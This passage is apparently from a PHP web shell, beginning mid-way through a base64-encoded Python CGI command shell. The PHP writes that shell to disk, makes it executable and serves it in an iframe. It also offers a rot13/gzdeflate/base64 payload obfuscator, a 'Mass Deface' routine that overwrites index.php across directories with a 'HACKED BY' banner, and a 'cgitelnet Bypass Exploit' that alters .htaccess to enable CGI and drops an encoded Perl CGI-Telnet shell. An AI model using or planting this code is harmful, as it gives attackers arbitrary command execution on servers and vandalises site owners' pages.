IlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g
aXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs
dWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu
Zy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g
d2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg
aXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg
ICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk
XSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt
W2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv
cm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg
PSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y
IGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg
ICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z
aGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+
CjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48
ST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl
cnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs
ICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg
Q29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr
IHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1
dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5
ZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n
IFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj
cmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6
IHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg
ICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs
YW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt
KFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt
aGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+
PEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS
PicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg
ICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg
ICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv
dXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy
aW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv
biwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv
bW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ
TygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh
bHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg
ICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD
SEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0
ZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw
cm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi';
        $file = fopen("python.izo", "w+");
        $write = fwrite($file, "#!/usr/bin/python\n# 07-07-04\n# v1.0.0\n\n# cgi-shell.py\n# A simple CGI that executes arbitrary shell commands.\n\n\n# Copyright Michael Foord\n# You are free to modify, use and relicense this code.\n\n# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....\n# Use at your own risk !!!\n\n# E-mail michael AT foord DOT me DOT uk\n# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html\n\n\"\"\"\nA simple CGI script to execute shell commands via CGI.\n\"\"\"\n################################################################\n# Imports\ntry:\n    import cgitb; cgitb.enable()\nexcept:\n    pass\nimport sys, cgi, os\nsys.stderr = sys.stdout\nfrom time import strftime\nimport traceback\nfrom StringIO import StringIO\nfrom traceback import print_exc\n\n################################################################\n# constants\n\nfontline = '<FONT COLOR=#424242 style=\"font-family:times;font-size:12pt;\">'\nversionstring = 'Version 1.0.0 7th July 2004'\n\nif os.environ.has_key(\"SCRIPT_NAME\"):\n    scriptname = os.environ[\"SCRIPT_NAME\"]\nelse:\n    scriptname = \"\"\n\nMETHOD = '\"POST\"'\n\n################################################################\n# Private functions and variables\n\ndef getform(valuelist, theform, notpresent=''):\n    \"\"\"This function, given a CGI form, extracts the data from it, based on\n    valuelist passed in. Any non-present values are set to '' - although this can be changed.\n    (e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)\"\"\"\n    data = {}\n    for field in valuelist:\n        if not theform.has_key(field):\n            data[field] = notpresent\n        else:\n            if  type(theform[field]) != type([]):\n                data[field] = theform[field].value\n            else:\n                values = map(lambda x: x.value, theform[field])     # allows for list type values\n                data[field] = values\n    return data\n\n\ntheformhead = \"\"\"<HTML><HEAD><TITLE>cgi-shell.py - a CGI by Fuzzyman</TITLE></HEAD>\n<BODY><CENTER>\n<H1>Welcome to cgi-shell.py - <BR>a Python CGI</H1>\n<B><I>By Fuzzyman</B></I><BR>\n\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + strftime('%I:%M %p, %A %d %B, %Y')+'.</CENTER><BR>'\n\ntheform = \"\"\"<H2>Enter Command</H2>\n<FORM METHOD=\\\"\"\"\" + METHOD + '\" action=\"' + scriptname + \"\"\"\\\">\n<input name=cmd type=text><BR>\n<input type=submit value=\"Submit\"><BR>\n</FORM><BR><BR>\"\"\"\nbodyend = '</BODY></HTML>'\nerrormess = '<CENTER><H2>Something Went Wrong</H2><BR><PRE>'\n\n################################################################\n# main body of the script\n\nif __name__ == '__main__':\n    print \"Content-type: text/html\"         # this is the header to the server\n    print                                   # so is this blank line\n    form = cgi.FieldStorage()\n    data = getform(['cmd'],form)\n    thecmd = data['cmd']\n    print theformhead\n    print theform\n    if thecmd:\n        print '<HR><BR><BR>'\n        print '<B>Command : ', thecmd, '<BR><BR>'\n        print 'Result : <BR><BR>'\n        try:\n            child_stdin, child_stdout = os.popen2(thecmd)\n            child_stdin.close()\n            result = child_stdout.read()\n            child_stdout.close()\n            print result.replace('\\n', '<BR>')\n\n        except Exception, e:                      # an error in executing the command\n            print errormess\n            f = StringIO()\n            print_exc(file=f)\n            a = f.getvalue().splitlines()\n            for line in a:\n                print line\n\n    print bodyend\n\n\n\"\"\"\nTODO/ISSUES\n\n\n\nCHANGELOG\n\n07-07-04        Version 1.0.0\nA very basic system for executing shell commands.\nI may expand it into a proper 'environment' with session persistence...\n\"\"\"");
        fclose($file);
        chmod("python.izo", 0755);
        echo " <iframe src=python/python.izo width=96% height=76% frameborder=0></iframe>\r\n \r\n </div>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'string') {
        $text = $_POST['code'];
        ?><center><br><br><b>+--=[ Script Encode & Decode ]=--+</b><br><br>
<form method="post"><br><br><br>
<textarea class='inputz' cols=80 rows=10 name="code"></textarea><br><br>
<select class='inputz' size="1" name="ope">
<option value="base64">Base64</option>
<option value="gzinflate">str_rot13 - gzinflate - base64</option>
<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
</select>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
<input class='inputzbut' type='submit' name='submits' value='Decrypt'>
</form>

<?php 
        $submit = $_POST['submit'];
        if (isset($submit)) {
            $op = $_POST["ope"];
            switch ($op) {
                case 'base64':
                    $codi = base64_encode($text);
                    break;
                case 'str':
                    $codi = base64_encode(str_rot13(gzdeflate(str_rot13($text))));
                    break;
                case 'gzinflate':
                    $codi = base64_encode(gzdeflate(str_rot13($text)));
                    break;
                default:
                    break;
            }
        }
        $submit = $_POST['submits'];
        if (isset($submit)) {
            $op = $_POST["ope"];
            switch ($op) {
                case 'base64':
                    $codi = base64_decode($text);
                    break;
                case 'str':
                    $codi = str_rot13(gzinflate(str_rot13(base64_decode($text))));
                    break;
                case 'gzinflate':
                    $codi = str_rot13(gzinflate(base64_decode($text)));
                    break;
                default:
                    break;
            }
        }
        echo '<textarea cols=80 rows=10 class="inputz" readonly>' . $codi . '</textarea></center><BR><BR>';
    } elseif (isset($_GET['x']) && $_GET['x'] == 'mass') {
        echo "<center/><br/><b><font color=#00ff00>-=[ Mass Deface ]=-</font></b><br>";
        error_reporting(0);
        ?>
<form ENCTYPE="multipart/form-data" action="<?php 
        $_SERVER['PHP_SELF'];
        ?>" method='post'>
<td><table><table class="tabnet" >
<form hethot='post'>
<tr>
	<tr>
	<td>&nbsp;&nbsp;Folder</td><td><input class ='inputz' type='text' name='path' size='60' value="<?php 
        echo getcwd();
        ?>"></td>
	</tr><br>
	<tr>
	<td>file name</td><td><input class ='inputz' type='text' name='file' size='60' value="index.php"></td>
	</tr>
</tr>
<th colspan='2'><b>Index code</b></th><br></table>
<textarea style='background:black;outline:none;' name='index' rows='10' cols='67'>HACKED BY X'1N73CT,PATCH YOUR SECURITY SYSTEM</textarea><br>
<center><input class='inputzbut' type='submit' value="&nbsp;&nbsp;Deface&nbsp;&nbsp;"></center></form></table><br></form>

<?php 
        $mainpath = $_POST[path];
        $file = $_POST[file];
        $dir = opendir("{$mainpath}");
        $code = base64_encode($_POST[index]);
        $indx = base64_decode($code);
        while ($row = readdir($dir)) {
            $start = @fopen("{$row}/{$file}", "w+");
            $finish = @fwrite($start, $indx);
            if ($finish) {
                echo "{$row}/{$file} > Done<br><br>";
            }
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'cgi') {
        echo "<center/><br/><b><font color=blue>+--==[ cgitelnet.v1  Bypass Exploit]==--+ </font></b><br><br>";
        mkdir('cgitelnet1', 0755);
        chdir('cgitelnet1');
        $kokdosya = ".htaccess";
        $dosya_adi = ".htaccess";
        $dosya = fopen($dosya_adi, 'w') or die("Dosya a&#231;&#305;lamad&#305;!");
        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\n\r\nAddType application/x-httpd-cgi .cin\r\n\r\nAddHandler cgi-script .cin\r\nAddHandler cgi-script .cin";
        fwrite($dosya, $metin);
        fclose($dosya);
        $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb3B5cmlnaHQgYW5kIExpY2VuY2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIENHSS1UZWxuZXQgVmVyc2lvbiAxLjAgZm9yIE5UIGFuZCBVbml4IDogUnVuIENvbW1hbmRzIG9uIHlvdXIgV2ViIFNlcnZlcgojCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBQZXJtaXNzaW9uIGlzIGdyYW50ZWQgdG8gdXNlLCBkaXN0cmlidXRlIGFuZCBtb2RpZnkgdGhpcyBzY3JpcHQgc28gbG9uZwojIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZSBpcyBsZWZ0IGludGFjdC4gSWYgeW91IG1ha2UgY2hhbmdlcyB0byB0aGUgc2NyaXB0CiMgcGxlYXNlIGRvY3VtZW50IHRoZW0gYW5kIGluZm9ybSBtZS4gSWYgeW91IHdvdWxkIGxpa2UgYW55IGNoYW5nZXMgdG8gYmUgbWFkZQojIGluIHRoaXMgc2NyaXB0LCB5b3UgY2FuIGUtbWFpbCBtZS4KIwojIEF1dGhvcjogUm9oaXRhYiBCYXRyYQojIEF1dGhvciBlLW1haWw6IHJvaGl0YWJAcm9oaXRhYi5jb20KIyBBdXRob3IgSG9tZXBhZ2U6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vCiMgU2NyaXB0IEhvbWVwYWdlOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2NnaXNjcmlwdHMvY2dpdGVsbmV0Lmh0bWwKIyBQcm9kdWN0IFN1cHBvcnQ6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vc3VwcG9ydC8KIyBEaXNjdXNzaW9uIEZvcnVtOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2Rpc2N1c3MvCiMgTWFpbGluZyBMaXN0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL21saXN0LwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgSW5zdGFsbGF0aW9uCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUbyBpbnN0YWxsIHRoaXMgc2NyaXB0CiMKIyAxLiBNb2RpZnkgdGhlIGZpcnN0IGxpbmUgIiMhL3Vzci9iaW4vcGVybCIgdG8gcG9pbnQgdG8gdGhlIGNvcnJlY3QgcGF0aCBvbgojICAgIHlvdXIgc2VydmVyLiBGb3IgbW9zdCBzZXJ2ZXJzLCB5b3UgbWF5IG5vdCBuZWVkIHRvIG1vZGlmeSB0aGlzLgojIDIuIENoYW5nZSB0aGUgcGFzc3dvcmQgaW4gdGhlIENvbmZpZ3VyYXRpb24gc2VjdGlvbiBiZWxvdy4KIyAzLiBJZiB5b3UncmUgcnVubmluZyB0aGUgc2NyaXB0IHVuZGVyIFdpbmRvd3MgTlQsIHNldCAkV2luTlQgPSAxIGluIHRoZQojICAgIENvbmZpZ3VyYXRpb24gU2VjdGlvbiBiZWxvdy4KIyA0LiBVcGxvYWQgdGhlIHNjcmlwdCB0byBhIGRpcmVjdG9yeSBvbiB5b3VyIHNlcnZlciB3aGljaCBoYXMgcGVybWlzc2lvbnMgdG8KIyAgICBleGVjdXRlIENHSSBzY3JpcHRzLiBUaGlzIGlzIHVzdWFsbHkgY2dpLWJpbi4gTWFrZSBzdXJlIHRoYXQgeW91IHVwbG9hZAojICAgIHRoZSBzY3JpcHQgaW4gQVNDSUkgbW9kZS4KIyA1LiBDaGFuZ2UgdGhlIHBlcm1pc3Npb24gKENITU9EKSBvZiB0aGUgc2NyaXB0IHRvIDc1NS4KIyA2LiBPcGVuIHRoZSBzY3JpcHQgaW4geW91ciB3ZWIgYnJvd3Nlci4gSWYgeW91IHVwbG9hZGVkIHRoZSBzY3JpcHQgaW4KIyAgICBjZ2ktYmluLCB0aGlzIHNob3VsZCBiZSBodHRwOi8vd3d3LnlvdXJzZXJ2ZXIuY29tL2NnaS1iaW4vY2dpdGVsbmV0LnBsCiMgNy4gTG9naW4gdXNpbmcgdGhlIHBhc3N3b3JkIHRoYXQgeW91IHNwZWNpZmllZCBpbiBTdGVwIDIuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb25maWd1cmF0aW9uOiBZb3UgbmVlZCB0byBjaGFuZ2Ugb25seSAkUGFzc3dvcmQgYW5kICRXaW5OVC4gVGhlIG90aGVyCiMgdmFsdWVzIHNob3VsZCB3b3JrIGZpbmUgZm9yIG1vc3Qgc3lzdGVtcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQokUGFzc3dvcmQgPSAiMTIzNDU2IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4KCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2UgdGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZgoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQKCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuCgokTlRDbWRTZXAgPSAiJiI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULgoKJFVuaXhDbWRTZXAgPSAiOyI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4LgoKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsJIyBUaW1lIGluIHNlY29uZHMgYWZ0ZXIgY29tbWFuZHMgd2lsbCBiZSBraWxsZWQKCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkjIHRha2UgdmVyeSBsb25nIHRvIGV4ZWN1dGUsIGxpa2UgImZpbmQgLyIuCgkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRhIGlzIHNlbnQgdG8gdGhlCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQoJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UKCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0CgkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQKIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLgojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YKIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQojIHNjcmlwdHMuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJlYWRQYXJzZSAKewoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsKCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7CgkKCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOwoKCWlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpCgl7CgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307Cgl9CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikKCXsKCQliaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7CgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsKCX0KCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykKCXsKCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IAoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IAoJCSRIZWFkZXJCb2R5ID0gJGxpc3RbMV07CgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOwoJCSRIZWFkZXIgPSAkYDsKCQkkQm9keSA9ICQnOwogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7CgkJJEhlYWRlciA9fiAvZmlsZW5hbWU9XCIoLispXCIvOyAKCQkkaW57J2YnfSA9ICQxOyAKCQkkaW57J2YnfSA9fiBzL1wiLy9nOwoJCSRpbnsnZid9ID1+IHMvXHMvL2c7CgoJCSMgcGFyc2UgdHJhaWxlcgoJCWZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspCgkJeyAKCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87CgkJCSRsaXN0WyRpXSA9fiAvXCIoXHcrKVwiLzsKCQkJJGtleSA9ICQxOwoJCQkkdmFsID0gJCc7CgkJCSR2YWwgPX4gcy8oXihcclxuXHJcbnxcblxuKSl8KFxyXG4kfFxuJCkvL2c7CgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7CgkJCSRpbnska2V5fSA9ICR2YWw7IAoJCX0KCX0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQoJewoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsKCQlmb3JlYWNoICRpICgwIC4uICQjaW4pCgkJewoJCQkkaW5bJGldID1+IHMvXCsvIC9nOwoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOwoJCQkka2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsKCQkJJGlueyRrZXl9IC49ICR2YWw7CgkJfQoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIFBhZ2UgSGVhZGVyCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludFBhZ2VIZWFkZXIKewoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7CgkkRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8dGl0bGU+Q0dJLVRlbG5ldCBWZXJzaW9uIDEuMDwvdGl0bGU+CiRIdG1sTWV0YUhlYWRlcgo8L2hlYWQ+Cjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5mb2N1cygpIiBiZ2NvbG9yPSIjMDAwMDAwIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiPgo8dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIj4KPHRyPgo8dGQgYmdjb2xvcj0iI0MyQkZBNSIgYm9yZGVyY29sb3I9IiMwMDAwODAiIGFsaWduPSJjZW50ZXIiPgo8Yj48Zm9udCBjb2xvcj0iIzAwMDA4MCIgc2l6ZT0iMiI+IzwvZm9udD48L2I+PC90ZD4KPHRkIGJnY